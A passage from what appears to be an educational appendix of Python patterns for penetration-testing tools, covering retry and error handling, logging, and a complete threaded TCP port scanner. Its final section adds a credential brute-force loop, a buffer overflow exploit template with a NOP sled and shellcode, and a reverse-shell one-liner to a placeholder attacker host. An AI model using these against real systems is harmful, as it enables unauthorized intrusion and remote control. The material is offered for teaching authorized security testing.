limiter.wait()
# ... perform scan ...
14. Error Handling Patterns
Robust Network Error Handling
import socket
import requests
import time
import functools
def retry(max_attempts=3, delay=1, backoff=2, exceptions=(Exception,)):
"""Decorator for retrying functions with exponential backoff."""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
attempts = 0
current_delay = delay
while attempts < max_attempts:
try:
return func(*args, **kwargs)
except exceptions as e:
attempts += 1
if attempts == max_attempts:
raise
print(f"[*] Retry {attempts}/{max_attempts} "
f"after {current_delay}s: {e}")
time.sleep(current_delay)
current_delay *= backoff
return wrapper
return decorator
@retry(max_attempts=3, delay=1,
exceptions=(requests.ConnectionError, requests.Timeout))
def resilient_request(url):
"""HTTP request with automatic retry."""
return requests.get(url, timeout=5)
# Comprehensive network error handling
def safe_connect(target, port, timeout=3):
"""Connect with comprehensive error handling."""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((target, port))
return sock
except socket.timeout:
print(f"[-] {target}:{port} — Connection timed out")
except ConnectionRefusedError:
print(f"[-] {target}:{port} — Connection refused")
except socket.gaierror:
print(f"[-] {target} — DNS resolution failed")
except PermissionError:
print(f"[-] {target}:{port} — Permission denied (firewall?)")
except OSError as e:
print(f"[-] {target}:{port} — OS error: {e}")
return None
15. Output Formatting and Logging
Colored Terminal Output
from colorama import Fore, Style, init
init(autoreset=True) # Auto-reset colors after each print
def print_success(msg):
print(f"{Fore.GREEN}[+]{Style.RESET_ALL} {msg}")
def print_error(msg):
print(f"{Fore.RED}[-]{Style.RESET_ALL} {msg}")
def print_info(msg):
print(f"{Fore.BLUE}[*]{Style.RESET_ALL} {msg}")
def print_warning(msg):
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} {msg}")
def print_banner(tool_name, version="1.0"):
banner = f"""
{Fore.CYAN}{'='*50}
{tool_name} v{version}
{'='*50}{Style.RESET_ALL}
"""
print(banner)
Structured Logging
import logging
from datetime import datetime
def setup_logger(name, log_file=None, level=logging.INFO):
"""Configure logging for security tools."""
logger = logging.getLogger(name)
logger.setLevel(level)
formatter = logging.Formatter(
"%(asctime)s | %(levelname)-8s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S"
)
# Console handler
console = logging.StreamHandler()
console.setFormatter(formatter)
logger.addHandler(console)
# File handler (optional)
if log_file:
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
# Usage
log = setup_logger("scanner", "scan_results.log")
log.info("Starting scan against 192.168.1.0/24")
log.warning("Port 445 (SMB) is open — check for EternalBlue")
log.error("Connection to 192.168.1.50 failed")
Table Output
from tabulate import tabulate
def display_results(results):
"""Display scan results as a formatted table."""
headers = ["Host", "Port", "State", "Service", "Version"]
rows = [
[r["host"], r["port"], r["state"], r["service"], r["version"]]
for r in results
]
print(tabulate(rows, headers=headers, tablefmt="grid"))
# Example output:
# +---------------+------+-------+----------+-----------+
# | Host | Port | State | Service | Version |
# +===============+======+=======+==========+===========+
# | 192.168.1.10 | 22 | open | ssh | OpenSSH 8 |
# | 192.168.1.10 | 80 | open | http | Apache 2 |
# | 192.168.1.10 | 443 | open | https | nginx 1.2 |
# +---------------+------+-------+----------+-----------+
16. Common Security Script Patterns
Complete Tool Template
#!/usr/bin/env python3
"""
PortHunter — Fast TCP Port Scanner
Author: Security Student
Usage: python3 porthunter.py -t TARGET -p PORTS [options]
"""
import argparse
import socket
import sys
import time
import threading
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
try:
from colorama import Fore, Style, init
init(autoreset=True)
HAS_COLOR = True
except ImportError:
HAS_COLOR = False
# --- Configuration ---
VERSION = "1.0.0"
DEFAULT_TIMEOUT = 1.0
DEFAULT_THREADS = 100
# --- Helper Functions ---
def color(text, color_code):
if HAS_COLOR:
return f"{color_code}{text}{Style.RESET_ALL}"
return text
def banner():
print(color(f"\n PortHunter v{VERSION}", Fore.CYAN))
print(color(f" {'─' * 30}\n", Fore.CYAN))
def parse_ports(spec):
ports = set()
for part in spec.split(","):
part = part.strip()
if "-" in part:
start, end = map(int, part.split("-"))
ports.update(range(start, end + 1))
else:
ports.add(int(part))
return sorted(ports)
# --- Core Logic ---
def scan_port(target, port, timeout):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
if s.connect_ex((target, port)) == 0:
try:
s.send(b"\r\n")
banner_text = s.recv(1024).decode(errors="replace").strip()
except:
banner_text = ""
return {"port": port, "state": "open", "banner": banner_text}
except:
pass
return None
def main():
parser = argparse.ArgumentParser(description="Fast TCP Port Scanner")
parser.add_argument("-t", "--target", required=True, help="Target host")
parser.add_argument("-p", "--ports", default="1-1024", help="Port spec")
parser.add_argument("--threads", type=int, default=DEFAULT_THREADS)
parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
parser.add_argument("-o", "--output", help="Output JSON file")
parser.add_argument("-q", "--quiet", action="store_true")
args = parser.parse_args()
if not args.quiet:
banner()
target = args.target
ports = parse_ports(args.ports)
# Resolve hostname
try:
target_ip = socket.gethostbyname(target)
except socket.gaierror:
print(color(f"[-] Cannot resolve: {target}", Fore.RED))
sys.exit(1)
print(f"[*] Scanning {target} ({target_ip}) — {len(ports)} ports")
start_time = time.time()
results = []
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {
executor.submit(scan_port, target_ip, port, args.timeout): port
for port in ports
}
for future in as_completed(futures):
result = future.result()
if result:
results.append(result)
port = result["port"]
banner_text = result["banner"][:60] if result["banner"] else ""
print(color(f" [+] {port:>5}/tcp open {banner_text}", Fore.GREEN))
elapsed = time.time() - start_time
results.sort(key=lambda x: x["port"])
print(f"\n[*] Scan complete: {len(results)} open ports "
f"found in {elapsed:.2f}s")
if args.output:
output_data = {
"target": target,
"ip": target_ip,
"scan_date": datetime.now().isoformat(),
"ports_scanned": len(ports),
"results": results,
"elapsed_seconds": round(elapsed, 2)
}
with open(args.output, "w") as f:
json.dump(output_data, f, indent=2)
print(f"[*] Results saved to {args.output}")
if __name__ == "__main__":
main()
Credential Checker Pattern
def credential_checker(target, service, cred_list):
"""Generic credential checking pattern."""
for username, password in cred_list:
try:
if service == "ssh":
success = try_ssh(target, username, password)
elif service == "ftp":
success = try_ftp(target, username, password)
elif service == "http":
success = try_http_login(target, username, password)
if success:
return (username, password)
except Exception:
continue
return None
Exploit Development Pattern
import struct
import socket
def build_exploit(target_ip, target_port, shellcode):
"""Generic buffer overflow exploit template."""
# Build the payload
offset = 1024 # Offset to EIP (found via fuzzing)
eip = struct.pack("<I", 0x625011AF) # JMP ESP address
nop_sled = b"\x90" * 16
payload = b"A" * offset
payload += eip
payload += nop_sled
payload += shellcode
# Send the exploit
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.send(payload)
sock.close()
print("[+] Exploit sent!")
except Exception as e:
print(f"[-] Exploit failed: {e}")
Quick Reference: Common One-Liners
# Reverse shell (netcat-style) — for authorized testing only
import os; os.system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1")
# Quick HTTP server for file transfer
# python3 -m http.server 8080
# Base64 encode/decode
import base64
encoded = base64.b64encode(b"payload data").decode()
decoded = base64.b64decode(encoded)
# URL encode/decode
from urllib.parse import quote, unquote
encoded = quote("param=value&foo=bar <script>")
decoded = unquote(encoded)
# Generate random strings (for tokens, filenames)
import secrets
token = secrets.token_hex(16) # 32-char hex string
url_token = secrets.token_urlsafe(16) # URL-safe string
# IP address manipulation
import ipaddress
network = ipaddress.ip_network("192.168.1.0/24")
hosts = list(network.hosts()) # All usable host IPs
# Timestamp conversion
from datetime import datetime
ts = datetime.fromtimestamp(1700000000) # Unix -> datetime
unix_ts = int(datetime.now().timestamp()) # datetime -> Unix
All code in this appendix is provided for educational purposes in authorized penetration testing and security research only. Always ensure you have proper written authorization before testing any system you do not own.